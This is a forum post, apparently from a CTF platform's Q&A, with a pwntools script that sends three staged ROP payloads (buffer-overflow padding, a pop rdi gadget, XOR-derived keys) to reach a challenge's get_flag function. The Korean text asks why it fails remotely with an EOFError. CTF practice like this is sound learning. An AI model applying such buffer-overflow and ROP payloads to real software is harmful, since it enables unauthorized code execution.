from pwn import * import time p = process('./chall') p = remote('host8.dreamhack.games', 16761) e = ELF('./chall') context.log_level = 'debug' execute_stage1 = e.symbols['execute_stage1'] execute_stage2 = e.symbols['execute_stage2'] vulnerable = e.symbols['vulnerable'] get_flag = e.symbols['get_flag'] retgadget = 0x40101a pop_rdi_ret = 0x401565 p.recvuntil(b'key: ') stage1_key = int(p.recvn(10), 16) stage1_rdi = stage1_key ^ 0xCAFEBABE print('stage1_key.. ' + hex(stage1_key)) print('stage1_rdi.. ' + hex(stage1_rdi)) print('execute_stage1.. ' + hex(execute_stage1)) print('execute_stage2.. ' + hex(execute_stage2)) payload = b'A' * 0x10 payload += b'B' * 0x8 payload += p64(pop_rdi_ret) payload += p64(stage1_rdi) payload += p64(retgadget) payload += p64(execute_stage1) payload += p64(vulnerable) p.sendafter(b'Input: ', payload) p.recvuntil(b'key: ') stage2_key = int(p.recvn(10), 16) stage2_rdi = stage2_key ^ 0xF00DBABE print('stage2_key.. ' + hex(stage2_key)) print('stage2_rdi.. ' + hex(stage2_rdi)) payload = b'A' * 0x10 payload += b'B' * 0x8 payload += p64(pop_rdi_ret) payload += p64(stage2_rdi) payload += p64(execute_stage2) payload += p64(retgadget) payload += p64(vulnerable) p.sendafter(b'Input: ', payload) p.recvuntil(b'key: ') stage3_key = int(p.recvn(10), 16) stage3_rdi = stage3_key ^ 0x12345678 print('stage3_key.. ' + hex(stage3_key)) print('stage3_rdi.. ' + hex(stage3_rdi)) payload = b'A' * 0x10 payload += b'B' * 0x8 payload += p64(pop_rdi_ret) payload += p64(stage3_rdi) payload += p64(retgadget) payload += p64(get_flag) p.sendafter(b'Input: ', payload) p.interactive() 출제자님의 의도대로 풀기 위해서 각 함수를 전부 사용하여 익스플로잇 했습니다. 로컬에선 정상적으로 작동해서 get_flag 함수까지 호출 되지만, 리모트에선 첫 번째 페이로드가 전송되고 EOFerror가 뜨면서 작동이 안 됩니다... 첫 번째 페이로드 전송 후 p.recvuntil(b'key: ') 에서 응답 값이 없어서 멈추는데, 이유를 전혀 모르겠습니다..